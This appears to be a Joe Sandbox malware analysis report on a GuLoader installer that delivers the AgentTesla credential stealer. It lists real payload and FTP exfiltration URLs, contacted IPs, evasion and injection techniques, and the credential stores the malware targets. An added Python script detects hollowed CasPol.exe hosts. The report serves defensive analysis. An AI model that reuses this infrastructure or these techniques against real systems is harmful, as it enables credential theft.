ID: 638284
Sample Name: ref002062022pago062022.exe
Cookbook: default.jbs
Time: 16:43:36
Date: 02/06/2022
Version: 34.0.0 Boulder Opal
Table of Contents
Windows Analysis Report ref002062022pago062022.exe
  Overview
    General Information
    Detection
    Signatures
    Classification
  Process Tree
  Malware Configuration
    Threatname: GuLoader
  Yara Signatures
    Memory Dumps
  Sigma Signatures
  Snort Signatures
  Joe Sandbox Signatures
    AV Detection
    Networking
    Data Obfuscation
    Malware Analysis System Evasion
    HIPS / PFW / Operating System Protection Evasion
    Stealing of Sensitive Information
    Remote Access Functionality
  Mitre Att&ck Matrix
  Behavior Graph
  Screenshots
    Thumbnails
  Antivirus, Machine Learning and Genetic Malware Detection
    Initial Sample
    Dropped Files
    Unpacked PE Files
    Domains
    URLs
  Domains and IPs
    Contacted Domains
    Contacted URLs
    URLs from Memory and Binaries
    World Map of Contacted IPs
    Public IPs
  General Information
  Warnings
  Simulations
    Behavior and APIs
  Joe Sandbox View / Context
    IPs
    Domains
    ASNs
    JA3 Fingerprints
    Dropped Files
  Created / dropped Files
    C:\Users\user\AppData\Local\Temp\Ostentativt.Arn
    C:\Users\user\AppData\Local\Temp\TChinese.ini
    C:\Users\user\AppData\Local\Temp\datastrrelsens.Til5
    C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll
    C:\Users\user\AppData\Local\Temp\window-close-symbolic.symbolic.png
    C:\Windows\Logs\waasmedic\waasmedic.20220602_155203_861.etl
    \Device\ConDrv
  Static File Info
    General
    File Icon
    Static PE Info
      General
      Entrypoint Preview
      Rich Headers
      Data Directories
      Sections
      Resources
      Imports
      Version Infos
      Possible Origin
  Network Behavior
    Network Port Distribution
    TCP Packets
    UDP Packets
    DNS Queries
    DNS Answers
    HTTP Request Dependency Graph
    HTTP Packets
  Statistics
    Behavior
  System Behavior
    Analysis Process: ref002062022pago062022.exe PID: 3504, Parent PID: 8512
      General
      File Activities
      Registry Activities
    Analysis Process: CasPol.exe PID: 1664, Parent PID: 3504
      General
    Analysis Process: CasPol.exe PID: 1740, Parent PID: 3504
      General
    Analysis Process: CasPol.exe PID: 1900, Parent PID: 3504
      General
    Analysis Process: CasPol.exe PID: 2172, Parent PID: 3504
      General
    Analysis Process: CasPol.exe PID: 1836, Parent PID: 3504
      General
      File Activities
        File Created
        File Written
        File Read
      Registry Activities
        Key Created
        Key Value Created
    Analysis Process: conhost.exe PID: 1840, Parent PID: 1836
      General
      File Activities
    Analysis Process: svchost.exe PID: 1900, Parent PID: 888
      General
      Registry Activities
  Disassembly
Copyright Joe Security LLC 2022 Page 2 of 26
Windows Analysis Report ref002062022pago062022.exe

Overview

General Information
Sample Name: ref002062022pago062022.exe
Analysis ID: 638284
MD5: 7500c0e8df88d1…
SHA1: 5e20971a917ceb…
SHA256: a4888274290402…

Detection
AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures (as truncated in the overview panel of the report)
Found malware configuration
Multi AV Scanner detection for subm…
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via fi…
Writes to foreign memory regions
Tries to harvest and steal Putty / W…
Tries to detect Any.run
Tries to harvest and steal ftp login c…
Tries to detect sandboxes and other…
C2 URLs / IPs found in malware con…
Queries sensitive network adapter in…
Tries to harvest and steal browser in…
Queries sensitive BIOS Information…
Uses 32bit PE files
Queries the volume information (nam…
May sleep (evasive loops) to hinder…
Contains functionality to shutdown /…
Uses code obfuscation techniques (…
Internet Provider seen in connection…
Detected potential crypto function
Found potential string decryption / a…
Sample execution stops while proce…
Yara detected Credential Stealer
Contains functionality to call native …
Contains functionality to dynamicall…
Contains functionality for execution …
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / U…
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PE…
Uses a known web browser user age…
Checks if the current process is bei…
Classification
(Radar chart, not reproduced. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.)
Process Tree
System is w10x64native
ref002062022pago062022.exe (PID: 3504, Parent PID: 8512, cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe", MD5: 7500C0E8DF88D12316724078FFBEEFAA)
  CasPol.exe (PID: 1664, cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe", MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  CasPol.exe (PID: 1740, cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe", MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  CasPol.exe (PID: 1900, cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe", MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  CasPol.exe (PID: 2172, cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe", MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  CasPol.exe (PID: 1836, cmdline: "C:\Users\user\Desktop\ref002062022pago062022.exe", MD5: 914F728C04D3EDDD5FBA59420E74E56B)
    conhost.exe (PID: 1840, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
svchost.exe (PID: 1900, Parent PID: 888, cmdline: C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc, MD5: F586835082F632DC8D9404D83BC16316)

Every CasPol.exe instance carries the installer's own path as its command line while its image hash is that of the .NET framework CasPol.exe. Together with the "Writes to foreign memory regions" and Process Injection signatures below, that is the footprint of the loader creating a CasPol.exe host and writing its payload into it; the command line is inherited from the creating process, the image is not. PID 1900 appears twice (a CasPol.exe and the svchost.exe), so PIDs were reused during the run and must not be used alone as keys.

Malware Configuration
Threatname: GuLoader
{ "Payload URL": "http://jmariecompany.com/Buhari0f_XGXisVNVRE198.bin"}

Yara Signatures

Memory Dumps
Source | Rule | Description | Author
00000000.00000002.1514512086.0000000002A00000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000000.856205776.0000000001100000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: CasPol.exe PID: 1836 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
(1 further entry is collapsed in the original report.)

Sigma Signatures
No Sigma rule has matched

Snort Signatures
No Snort rule has matched

Joe Sandbox Signatures

AV Detection
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain

Networking
C2 URLs / IPs found in malware configuration

Data Obfuscation
Yara detected GuLoader

Malware Analysis System Evasion
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

HIPS / PFW / Operating System Protection Evasion
Writes to foreign memory regions

Stealing of Sensitive Information
Yara detected AgentTesla
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to harvest and steal browser information (history, passwords, etc)

Remote Access Functionality
Yara detected AgentTesla

Mitre Att&ck Matrix
Techniques the signatures mapped to, per tactic. The leading numbers are the counts printed beside each cell in the original matrix. Tactics with no match (Initial Access, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects) are omitted.
Execution: 2 1 1 Windows Management Instrumentation; 1 Native API
Persistence: 1 DLL Side-Loading
Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 1 1 1 Process Injection
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 2 5 1 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 1 1 1 Process Injection
Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry
Discovery: 3 File and Directory Discovery; 1 1 7 System Information Discovery; 3 3 1 Security Software Discovery; 1 Process Discovery; 2 5 1 Virtualization/Sandbox Evasion; 1 Application Window Discovery
Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 1 Clipboard Data
Command and Control: 1 Ingress Tool Transfer; 1 Encrypted Channel; 2 Non-Application Layer Protocol; 1 1 2 Application Layer Protocol
Impact: 1 System Shutdown/Reboot
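The process tree shows five CasPol.exe instances whose command line is the installer's own path. The following Python is an added example, not part of the Joe Sandbox report: it reads process-creation records in a constructed pid|ppid|image|cmdline format, filled with the PIDs, images and command lines this report lists (the CasPol.exe image path is the one given under Created / dropped Files), and flags the two observable traits of the pattern, an image whose command line names a different executable and a .NET framework host started by a process living in a user-writable directory. The list of .NET host binaries and the set of user-writable directories are general assumptions, not something the report states.

```python
"""
Hollowed-host detector for process-creation records.

Added example for this report, not Joe Sandbox code. Record format
(constructed for this example): pid|ppid|image_path|command_line
"""
import ntpath
import re
from typing import List, NamedTuple, Optional


class Proc(NamedTuple):
    pid: int
    ppid: int
    image: str
    cmdline: str


# Records rebuilt from the report's process list. PID 8512 (parent of the
# sample) is not in the report, so the sample has no parent record here.
SAMPLE_EVENTS = r"""
3504|8512|C:\Users\user\Desktop\ref002062022pago062022.exe|"C:\Users\user\Desktop\ref002062022pago062022.exe"
1664|3504|C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe|"C:\Users\user\Desktop\ref002062022pago062022.exe"
1740|3504|C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe|"C:\Users\user\Desktop\ref002062022pago062022.exe"
1900|3504|C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe|"C:\Users\user\Desktop\ref002062022pago062022.exe"
2172|3504|C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe|"C:\Users\user\Desktop\ref002062022pago062022.exe"
1836|3504|C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe|"C:\Users\user\Desktop\ref002062022pago062022.exe"
1840|1836|C:\Windows\System32\conhost.exe|C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1900|888|C:\Windows\System32\svchost.exe|C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
"""

# .NET framework binaries commonly used as injection hosts (assumption).
DOTNET_HOSTS = {"caspol.exe", "regasm.exe", "regsvcs.exe", "installutil.exe", "msbuild.exe"}

# Directories a standard user can write to (assumption; Windows paths, case-insensitive).
USER_WRITABLE = re.compile(
    r"^[a-z]:\\users\\[^\\]+\\(desktop|downloads|documents|appdata)\\", re.IGNORECASE
)


def parse_events(text: str) -> List[Proc]:
    procs = []
    for line in text.strip().splitlines():
        pid, ppid, image, cmdline = line.split("|", 3)
        procs.append(Proc(int(pid), int(ppid), image, cmdline))
    return procs


def argv0(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted program path."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:] if end == -1 else s[1:end]
    return s.split(None, 1)[0] if s else ""


def find_parent(procs: List[Proc], child: Proc) -> Optional[Proc]:
    # PIDs are reused during a run (1900 is both a CasPol.exe and an svchost.exe
    # here), so take the earliest record with that PID rather than a dict lookup.
    for p in procs:
        if p.pid == child.ppid and p is not child:
            return p
    return None


def analyse(text: str) -> List[dict]:
    """Return one finding per process that shows hollowed-host traits."""
    procs = parse_events(text)
    findings = []
    for p in procs:
        image_name = ntpath.basename(p.image).lower()
        cmd_name = ntpath.basename(argv0(p.cmdline)).lower()
        parent = find_parent(procs, p)
        reasons = []
        if cmd_name and cmd_name != image_name:
            reasons.append(f"command line names {cmd_name} but the image is {image_name}")
        if image_name in DOTNET_HOSTS and parent and USER_WRITABLE.match(parent.image):
            reasons.append(
                f"{image_name} started by {ntpath.basename(parent.image)} from a user-writable directory"
            )
        if reasons:
            findings.append({"pid": p.pid, "image": image_name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f["pid"], f["image"], "; ".join(f["reasons"]))
```

On the report's records this flags exactly the five CasPol.exe processes, each for both reasons, and nothing else; conhost.exe and svchost.exe pass because their command lines name their own image. The image/command-line check is the cheaper and more general of the two, since it does not depend on a host list, but it also fires on legitimate launchers that reuse a parent's command line, so it is best used as a scoring input rather than a standalone alert.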
Behavior Graph
ID: 638284
Sample: ref002062022pago062022.exe
Startdate: 02/06/2022
Architecture: WINDOWS
Score: 100

The graph is a figure; the information recoverable from it:
Domains in graph: jmariecompany.com, alighierieventos.com
Process nodes: ref002062022pago062022.exe (node counters 2 / 22); CasPol.exe (node counters 15 / 11); CasPol.exe; svchost.exe; 3 other processes; conhost.exe. Per the legend the node counters are the number of created registry values and the number of created files.
Edges: the sample dropped C:\Users\user\AppData\Local\...\System.dll, PE32; "started" edges link the sample to the CasPol.exe nodes and CasPol.exe to conhost.exe, consistent with the process tree.
Network node: jmariecompany.com, 139.28.232.231, 49746 -> 80, DEDIPATH-LLCUS, Netherlands
Signatures shown on the sample node: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 4 other signatures
Signatures shown on the CasPol.exe nodes: Writes to foreign memory regions; Tries to detect Any.run; Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 2 other signatures
Also shown: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet

Screenshots

Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow. (Not reproduced.)
Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
ref002062022pago062022.exe | 16% | Virustotal |
ref002062022pago062022.exe | 22% | ReversingLabs | Win32.Downloader.GuLoader

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll | 3% | Metadefender |
C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll | 0% | ReversingLabs |

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://api.ipify.org%t- | 0% | Avira URL Cloud | safe
ftp://alighierieventos.com/buhari0f9ja | 100% | Avira URL Cloud | malware
tVzYUP.com | 0% | Avira URL Cloud | safe
127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
https://api.ipify.org%%startupfolder% | 0% | Avira URL Cloud | safe
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin2 | 0% | Avira URL Cloud | safe
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | Avira URL Cloud | safe
DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | Avira URL Cloud | safe
https://rPVMd8mXTm2hvq.com | 0% | Avira URL Cloud | safe
Domains and IPs

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dual-a-0001.a-msedge.net | 13.107.21.200 | true | false | | unknown
alighierieventos.com | 50.31.177.39 | true | false | | unknown
jmariecompany.com | 139.28.232.231 | true | true | | unknown

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin | true | Avira URL Cloud: safe | unknown
Note that this is the payload URL from the extracted malware configuration and the report still marks it malicious; the URL reputation column lags the configuration extraction and should not be used to downgrade the indicator.

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org%t- | CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
ftp://alighierieventos.com/buhari0f9ja | CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
tVzYUP.com | CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
127.0.0.1:HTTP/1.1 | CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://api.ipify.org%%startupfolder% | CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
jmariecompany.com/Buhari0f_XGXisVNVRE198.bin2 | CasPol.exe, 00000007.00000002.5725601189.0000000001546000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1098316376.000000000154C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
nsis.sf.net/NSIS_ErrorError | ref002062022pago062022.exe | false | | high
schemas.xmlsoap.org/ws/2005/05/identity/claims/name | CasPol.exe, 00000007.00000002.5752989159.000000001D9CA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
DynDns.comDynDNSnamejidpasswordPsi/Psi | CasPol.exe, 00000007.00000002.5751648911.000000001D891000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rPVMd8mXTm2hvq.com | CasPol.exe, 00000007.00000002.5752989159.000000001D9CA000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000007.00000003.1041975921.000000001C6D1000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

World Map of Contacted IPs
(Map figure not reproduced. Its legend buckets countries by share of contacted IPs: No. of IPs < 25%, 25% < No. of IPs < 50%, 50% < No. of IPs < 75%, 75% < No. of IPs.)

Public IPs
IP | Domain | Country | ASN | ASN Name | Malicious
139.28.232.231 | jmariecompany.com | Netherlands | 35913 | DEDIPATH-LLCUS | true
General Information
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 638284
Start date and time: 2022-06-02 16:43:36 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 27s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ref002062022pago062022.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@13/7@3/1
EGA Information: Successful, ratio: 100%
HDC Information: Successful, ratio: 18.5% (good quality ratio 18.1%); Quality average: 88.2%; Quality standard deviation: 21.4%
HCA Information: Successful, ratio: 99%; Number of executed functions: 0; Number of non-executed functions: 0
Cookbook Comments: Found application associated with file extension: .exe; Adjust boot time; Enable AMSI

Warnings
Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, MusNotificationUx.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 40.117.96.136, 13.107.5.88, 51.105.236.244, 51.124.57.242
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, e-0009.e-msedge.net, arc.msn.com, login.live.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.bing.com, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, fs.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
Not all processes were analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
This is a light report that stopped on timeout with several size caps hit, so the behaviour sections are incomplete; the absence of an activity from this report is not evidence that the sample does not perform it.

Simulations

Behavior and APIs
Time | Type | Description
16:46:22 | API Interceptor | 2759x Sleep call for process: CasPol.exe modified
The sandbox shortened 2759 Sleep calls in CasPol.exe; the payload's long sleeps (see "Contains long sleeps (>= 3 min)" in the overview) were skipped to reach its behaviour within the analysis window, so timings in this report do not reflect the sample's own pacing.

Joe Sandbox View / Context
IPs: No context
Domains: No context
ASNs: No context
JA3 Fingerprints: No context
Dropped Files: No context
Created / dropped Files

C:\Users\user\AppData\Local\Temp\Ostentativt.Arn
Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: data
Category: dropped
Size (bytes): 84955
Entropy (8bit): 6.493773506936205
Encrypted: false
SSDEEP: 1536:+c+7NKOl3NFSGc4zKyxqBfoRio6XA5A/x8aveGlalwm:+c+b57Nc4Tqat2/xgl5
MD5: 7913F41BDE98D253E411ED6C39072084
SHA1: 0F278DD10891F54ED93490358D8E2962D7CB4446
SHA-256: E48696EE8CACBBF70AB01F8BCFA00887BC1F499233419BCFA9963AECE2F5F061
SHA-512: 3D32411E45A46C3526BDD3B92134DC67B8485F1A97FAE97CA0F7B67C4BA74925AC26003603019B44D04F34B0966AD6615F34F354E6259F8D88B21E62543435ED
Malicious: false
Reputation: low
Preview: ..............5...........................................................d.f....&#I.2......................................f........81.O.....................................................f.....f.........2...Ibbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb..s.f.a...f......)9q.<...............................................b.....f....#.FEo.........................................f.e....."NxA2<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<...i...f.......i.*.LLLLLLLLLLLLLLLLLLLLLLLLL......f......r.&....f].................................t......4..2................................................................!...f................................f....c..e..r.a.$c,.l66666666666666666666666666666666..G.,...........f....-w..=...........................................v......j..r.?.1..*Z.............................................f....q...q.f.b.f...f...........nnnnnnnnnnnnnnnnnnnnnnnnnnn...o.......a.....+q.3L ....c......!5.!@.............................
C:\Users\user\AppData\Local\Temp\TChinese.ini
(The preview below is a [Translations] table for a ROG XG Mobile utility: filler content bundled in the installer, not part of the payload.)
Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 2298
Entropy (8bit): 4.473680609114741
Encrypted: false
SSDEEP: 48:rL4i5ST3JO8HvYe6jj90Pb/wt2Btvtl3IoweHuK:rL4i52JhHvYe63CjtHv39d
MD5: 92F6C6E96B642FDFAE071A6522F8D23D
SHA1: 7ABB9950955094F3717E5CE55D6C4EE4C4AC9B61
SHA-256: F1156ACD8EE2349454B3C55917E19EF81DB3491B241658B99E6DAF628DEB9913
SHA-512: F3B3548E21CF1BDF47A1191880AE2D8122B1ADDB0E6B371EE3EA3D7D6F205B09213D15492086526D9F9EFC836CFBC880616B1D746B3C9C12F9144B6F9B77ADA0
Malicious: false
Reputation: low
Preview: ..[.T.r.a.n.s.l.a.t.i.o.n.s.].....R.O.G. .X.G. .M.o.b.i.l.e. .p.l.u.g.g.e.d.-.i.n. .=.#..c .R.O.G. .X.G. .o.:yaS.Y.c.v....P.u.s.h. .t.h.e. .".U.n.l.o.c.k. .S.w.i.t.c.h.". .o.n. .t.o.p. .o.f. .t.h.e. .p.l.u.g. .t.o. .l.o.c.k. .y.o.u.r. .c.a.b.l.e. .i.n. .p.l.a.c.e...=..R.c ."......". ..N.\vQ.V.[.0....D.o.n.'.t. .s.h.o.w. .t.h.i.s. .m.e.s.s.a.g.e. .a.g.a.i.n.=..N.Qo.:y....O.K.=.O.K.....C.a.n.c.e.l.=..S.m....A.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.=._U.R .R.O.G. .X.G. .o.:yaS.Y.c.v....D.e.a.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.=.\P(u .R.O.G. .X.G. .o.:yaS.Y.c.v....C.l.i.c.k. .O.K. .t.o. .s.w.i.t.c.h. .t.o. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e...=...d .O.K. ..R.c. .R.O.G. .X.G. .o.:yaS.Y.c.v.0....C.l.i.c.k. .O.K. .t.o. .d.e.a.c.t.i.v.a.t.e. .t.h.e. .R.O.G. .X.G. .M.o.b.i.l.e.,. .a.n.d. .t.h.e.n. .s.a.f.e.l.y. .r.e.m.o.v.e. .t.h.e. .d.e.v.i.c.e...=...d .O.K. .\P(u .R.O.G. .X.G. .o.:yaS.Y.c.v&N.[hQ.yd..n..0....P.r.o.c.e.s.s.i.n.g.=.U..t-N....S.w.i.t.c.h. .t.o. .
C:\Users\user\AppData\Local\Temp\datastrrelsens.Til5
Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 19664
Entropy (8bit): 3.9986948974384626
Encrypted: false
SSDEEP: 384:LW5aeHlhv8r7DhA9znQeTRa1gOOFqV1+dHle6LCS+4ssqpM4XjqJZd:KQqRmXknmKFqV1SCSDZ4zqJZd
MD5: CCA75233F04853DE46ACFD473166211B
SHA1: D053CB686993FD4465B4ED47160675E05B76C96F
SHA-256: 85A665CE6DEBBF8D5FECE6BEF104A8DD0C5EA737DCF95C9F682298769E41ED5F
SHA-512: FD56C82A47E732B68EC5A0077A283921BCDB9B1450C8B04FFDD2768C7626E41009333B737CFC0E674231BE48043A92FE9F7DC9A10346A5BE41BE7CE9988A364C
Malicious: false
Preview: (omitted)
C:\Users\user\AppData\Local\Temp\nsnA19B.tmp\System.dll
(A Nullsoft installer extracts its plugins into an ns*.tmp directory at run time; System.dll is the stock NSIS System plugin the stub uses to call Win32 APIs, which is why it scores low and is not marked malicious. The payload is not in this file.)
Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 12288
Entropy (8bit): 5.814115788739565
Encrypted: false
SSDEEP: 192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5: CFF85C549D536F651D4FB8387F1976F2
SHA1: D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256: 8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512: 531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious: false
Antivirus: Metadefender, Detection: 3%; ReversingLabs, Detection: 0%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*[email protected][email protected][email protected]............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@[email protected].......*[email protected].......`.......,[email protected]................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\window-close-symbolic.symbolic.png
Process: C:\Users\user\Desktop\ref002062022pago062022.exe
File Type: PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category: dropped
Size (bytes): 195
Entropy (8bit): 6.320143910674748
Encrypted: false
SSDEEP: 3:yionv//thPl9vt3lAnsrtxBll/V0MaYAWrsWm8uH4FTeBT3XLaKwrgpHIQ32kVU7:6v/lhPyskMaDsTuiSBTrar+IQ32k2VLp
MD5: CF42A428EB747F762D55241CFBE28294
SHA1: 6BE84AD9DD71A758407455F58ADEFF7567CD64AA
SHA-256: F27C644A9F71175C447D2C89186F9E88E26BBB30A9D0AB75F4FEF23A44F08C21
SHA-512: 5E92FA2A3B42A863B6D7DD57ADB0EEC4EB5BCAB2344558B456F3C27E9189A6DF6E844A7F628CFC0B494249F03B7F34BC28F8D49A4B5B6110CB488EE1BB001A68
